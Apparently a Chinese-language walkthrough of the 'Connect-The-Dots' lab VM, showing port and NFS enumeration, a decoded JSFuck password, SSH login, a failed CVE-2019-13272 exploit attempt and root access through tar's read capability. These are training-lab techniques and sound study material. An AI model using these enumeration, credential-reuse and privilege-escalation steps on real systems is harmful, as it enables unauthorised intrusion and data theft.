Connect-The-Dots
Connect-The-Dots
目录
1 信息收集
nmap -sV -T 4 -p - 192.168.56.101
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-18 13:45 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.56.101
Host is up (0.0000010s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
80/tcp open http Apache httpd 2.4.38 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
2049/tcp open nfs_acl 3 (RPC #100227)
7822/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
34817/tcp open nlockmgr 1-4 (RPC #100021)
45333/tcp open mountd 1-3 (RPC #100005)
50063/tcp open mountd 1-3 (RPC #100005)
55403/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:E4:98:7F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Target: http://192.168.56.101/
[13:48:45] Starting:
[13:48:59] 200 - 6KB - /backups
[13:49:09] 301 - 317B - /images -> http://192.168.56.101/images/
[13:49:09] 200 - 1KB - /images/
[13:49:09] 200 - 2KB - /index.html
[13:49:09] 200 - 2KB - /index.htm
[13:49:10] 301 - 321B - /javascript -> http://192.168.56.101/javascript/
[13:49:13] 301 - 317B - /manual -> http://192.168.56.101/manual/
[13:49:13] 200 - 626B - /manual/index.html
[13:49:15] 301 - 317B - /mysite -> http://192.168.56.101/mysite/
Task Completed1.2.1 目录分析
http://192.168.56.101/mysite/中发现bootstrap.min.cs文件,不知道是什么东东,百度知道是 jsfuck 编码![]()
1.2.2 解JSFuck编码
将
b1到b10连接起来,进行解密得到:You're smart enough to understand me. Here's your secret, TryToGuessThisNorris@2k19![]()
2 目标服务安全检测
nmap检测
# nmap -sV -p 21 --script ftp* 192.168.56.101 Nmap scan report for 192.168.56.101 Host is up (0.00070s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later | ftp-brute: | Accounts: No valid accounts found |_ Statistics: Performed 11495 guesses in 600 seconds, average tps: 18.9 MAC Address: 08:00:27:E4:98:7F (Oracle VirtualBox virtual NIC)MSF检测
exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.56.101 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run [*] 192.168.56.101:21 - Banner: 220 Welcome to Heaven! [*] 192.168.56.101:21 - USER: 530 Permission denied. [-] 192.168.56.101:21 - This server is configured for anonymous only and the backdoor code cannot be reached [*] Exploit completed, but no session was created.nmap检测
# nmap -sV -p2049 --script=nfs* 192.168.56.101 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 14:45 CST Nmap scan report for 192.168.56.101 Host is up (0.00044s latency). PORT STATE SERVICE VERSION 2049/tcp open nfs 3-4 (RPC #100003)通过rpcinfo确定主机上是否运行或挂载了NFS服务。
# rpcinfo -p 192.168.56.101 program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100005 1 udp 52808 mountd 100005 1 tcp 58619 mountd 100005 2 udp 48380 mountd 100005 2 tcp 49693 mountd 100005 3 udp 55297 mountd 100005 3 tcp 60241 mountd 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100227 3 tcp 2049 100003 3 udp 2049 nfs 100227 3 udp 2049 100021 1 udp 38475 nlockmgr 100021 3 udp 38475 nlockmgr 100021 4 udp 38475 nlockmgr 100021 1 tcp 40283 nlockmgr 100021 3 tcp 40283 nlockmgr 100021 4 tcp 40283 nlockmgr通过showmount显示导出文件夹列表
# showmount -e 192.168.56.101 Export list for 192.168.56.101: /home/morris *- 默认:不加任何参数,显示连接的主机
-d:显示目录-a:显示挂载点
MSF检测
# 显示导出文件夹 auxiliary/scanner/nfs/nfsmount访问NFS共享
# mkdir /temp/ # mount -t nfs 192.168.56.101:/ /temp -o nolock # 挂载成功后使用df -h 验证 # df -h Filesystem Size Used Avail Use% Mounted on udev 1.9G 0 1.9G 0% /dev tmpfs 393M 1.2M 391M 1% /run /dev/sda1 78G 33G 41G 45% / tmpfs 2.0G 0 2.0G 0% /dev/shm tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 393M 64K 393M 1% /run/user/131 tmpfs 393M 60K 393M 1% /run/user/1000 192.168.56.101:/ 5.4G 3.8G 1.4G 74% /temp 192.168.56.101:/home 5.4G 3.8G 1.4G 74% /temp/home # 访问共享文件夹。 # ls -la /temp total 48 drwxr-xr-x 19 root root 4096 Oct 11 2019 . drwxr-xr-x 20 root root 36864 Mar 18 15:48 .. drwxr-xr-x 4 root root 4096 Oct 11 2019 home # ls -la /temp/home/morris total 56 drwxr-xr-x 8 kali kali 4096 Oct 11 2019 . drwxr-xr-x 4 root root 4096 Oct 11 2019 .. -rw------- 1 kali kali 1 Oct 11 2019 .bash_history -rw-r--r-- 1 kali kali 220 Oct 11 2019 .bash_logout -rw-r--r-- 1 kali kali 3526 Oct 11 2019 .bashrc drwx------ 9 kali kali 4096 Oct 11 2019 .cache drwx------ 10 kali kali 4096 Oct 11 2019 .config drwx------ 3 kali kali 4096 Oct 11 2019 .gnupg -rw------- 1 kali kali 1884 Oct 11 2019 .ICEauthority drwx------ 3 kali kali 4096 Oct 11 2019 .local -rw-r--r-- 1 kali kali 807 Oct 11 2019 .profile drwx------ 2 kali kali 4096 Oct 11 2019 .ssh drwxr-xr-x 2 kali kali 4096 Oct 11 2019 Templates -rw------- 1 kali kali 52 Oct 11 2019 .Xauthority遇到没有读取权限解决方式
3 ssh尝试GetShell
# 利用目录分析收集到的信息得到网络管理的用户名为:morris
# 他兄弟与他的名字为:norris
# jsfuck得到的密码为:TryToGuessThisNorris@2k19
# 成功登录目标系统
┌──(kali㉿kali)-[/temp/home/morris/.ssh]
└─$ ssh -p 7822 norris@192.168.56.101
norris@192.168.56.101's password:
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
###
# # # # ##### # ## ##### # # # ####
# ## # # # # # # # # ## # # #
# # # # # # # # # # # # # # #
# # # # # # # ###### # # # # # # ###
# # ## # # # # # # # # ## # #
### # # # # # # # # # # # ####
norris@sirrom:~$ cat user.txt
2c2836a138c0e7f7529aa0764a6414d03 提权
norris@sirrom:~$ sudo -l
[sudo] password for norris:
Sorry, user norris may not run sudo on sirrom.查看当前用户所创建的文件
find / -user norris 2>/dev/null# 得到norris家目录存在以下文件 norris@sirrom:~$ ls -l total 8 dr-xr-xr-x 3 nobody nogroup 4096 Oct 11 2019 ftp -r-------- 1 norris norris 33 Oct 11 2019 user.txt ┌──(kali㉿kali)-[~] └─$ tree files files ├── backups.bak ├── game.jpg.bak ├── hits.txt.bak └── m.gif.bak 0 directories, 4 files查看当前系统具有sid权限的文件
find / -perm -u=s -type f 2>/dev/nullnorris@sirrom:~$ find / -perm -u=s -type f 2>/dev/null /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/lib/xorg/Xorg.wrap /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/sbin/pppd /usr/sbin/mount.nfs /usr/bin/gpasswd /usr/bin/umount /usr/bin/newgrp /usr/bin/passwd /usr/bin/fusermount /usr/bin/chfn /usr/bin/bwrap /usr/bin/mount /usr/bin/su /usr/bin/pkexec /usr/bin/ntfs-3g /usr/bin/chsh /usr/bin/sudo
3.3.1 用户切换
利用3.2-6收集的信息成功切换到morris用户
norris@sirrom:~$ su - morris Password: blehguessme090 morris@sirrom:~$ id uid=1000(morris) gid=1000(morris) groups=1000(morris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner) morris@sirrom:~$查看目标系统的
/etc/passwd文件morris@sirrom:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin avahi-autoipd:x:107:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin sshd:x:110:65534::/run/sshd:/usr/sbin/nologin pulse:x:111:119:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false avahi:x:113:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin saned:x:114:122::/var/lib/saned:/usr/sbin/nologin colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin geoclue:x:116:124::/var/lib/geoclue:/usr/sbin/nologin hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false morris:x:1000:1000:morris,,,:/home/morris:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin ftp:x:119:126:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin _rpc:x:120:65534::/run/rpcbind:/usr/sbin/nologin statd:x:121:65534::/var/lib/nfs:/usr/sbin/nologin norris:x:1001:1001:norris,,,:/home/norris:/bin/bash morris@sirrom:~$切换后morris用户也没有sudo权限,本地也没有什么有用的文件
3.3.2 利用漏洞提权
切换回norris用户,并下载Tags · mzet-/linux-exploit-suggester (github.com),扫描目标系统可以利用的提权漏洞:CVE-2019-13272
norris@sirrom:~/ftp/files/linux-exploit-suggester-1.1$ ./linux-exploit-suggester.sh Available information: Kernel version: 4.19.0 Architecture: x86_64 Distribution: debian Distribution version: 10 Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed Package listing: from current OS Searching among: 73 kernel space exploits 43 user space exploits Possible Exploits: [+] [CVE-2019-13272] PTRACE_TRACEME Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 Exposure: highly probable Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*} Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c下载并编译poc文件
┌──(kali㉿kali)-[~] └─$ wget https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c ┌──(kali㉿kali)-[~] └─$ gcc poc.c -o poc ┌──(kali㉿kali)-[~] └─$ scp -P 7822 poc norris@192.168.56.101:/home/norris/提权失败
norris@sirrom:~$ ./poc ./poc: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./poc)CVE-2019-13272利用条件:
3.3.3 利用可执行文件的capabilities实现权限提升。
原理:c linux 获取cpuid_Linux系统利用可执行文件的Capability实现权限提升_Ningling Pan的博客-CSDN博客
查看权限
norris@sirrom:~$ /sbin/getcap -r / 2>/dev/null /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep /usr/bin/tar = cap_dac_read_search+ep /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep /usr/bin/ping = cap_net_raw+ep/usr/bin/tar = cap_dac_read_search+ep:可以绕过文件的读权限检查和目录的读和执行权限检查。
利用tar打包
/root目录方式提权norris@sirrom:~$ tar -vcf root.tar /root tar: Removing leading `/' from member names /root/ /root/root.txt /root/.bashrc /root/.gnupg/ /root/.gnupg/private-keys-v1.d/ /root/.bash_history /root/.cache/ /root/.local/ /root/.local/share/ /root/.local/share/nano/ /root/.profile norris@sirrom:~$ ls -la root.tar -rw-r--r-- 1 norris norris 10240 Mar 19 08:44 root.tar norris@sirrom:~$ tar -xf root.tar norris@sirrom:~$ ls -la /root total 36 drwx------ 5 norris norris 4096 Oct 11 2019 . drwxr-xr-x 6 norris norris 4096 Mar 19 08:45 .. -r-------- 1 norris norris 672 Oct 11 2019 .bash_history -rw-r--r-- 1 norris norris 570 Jan 31 2010 .bashrc drwx------ 2 norris norris 4096 Oct 11 2019 .cache drwx------ 3 norris norris 4096 Oct 11 2019 .gnupg drwxr-xr-x 3 norris norris 4096 Oct 11 2019 .local -rw-r--r-- 1 norris norris 148 Aug 17 2015 .profile -rw------- 1 norris norris 33 Oct 11 2019 root.txt norris@sirrom:~$ cat /root/root.txt 8fc9376d961670ca10be270d52eda423
手机扫一扫
移动阅读更方便
你可能感兴趣的文章